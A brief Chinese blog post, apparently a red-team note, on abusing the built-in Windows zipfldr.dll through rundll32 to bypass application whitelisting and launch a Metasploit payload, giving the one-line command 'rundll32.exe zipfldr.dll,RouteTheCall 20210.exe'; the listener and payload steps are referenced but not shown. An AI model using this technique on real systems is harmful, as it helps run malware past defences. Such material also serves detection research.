白名单执行payload之zipfldr.dll

简介

zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件
所在路径已被系统添加PATH环境变量中,因此,zipfldr.dll命令可识别,但由于为dll文件,需调用rundll32.exe来执行


已添加环境变量,路径如下:
C:WindowsSystem32zipfldr.dll
C:WindowsSysWOW64zipfldr.dll

实际使用

msf设置监听如下:


生成payload如下:


目标终端运行如下,确认成功上线:
rundll32.exe zipfldr.dll,RouteTheCall 20210.exe

联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/Yang34/p/14407805.html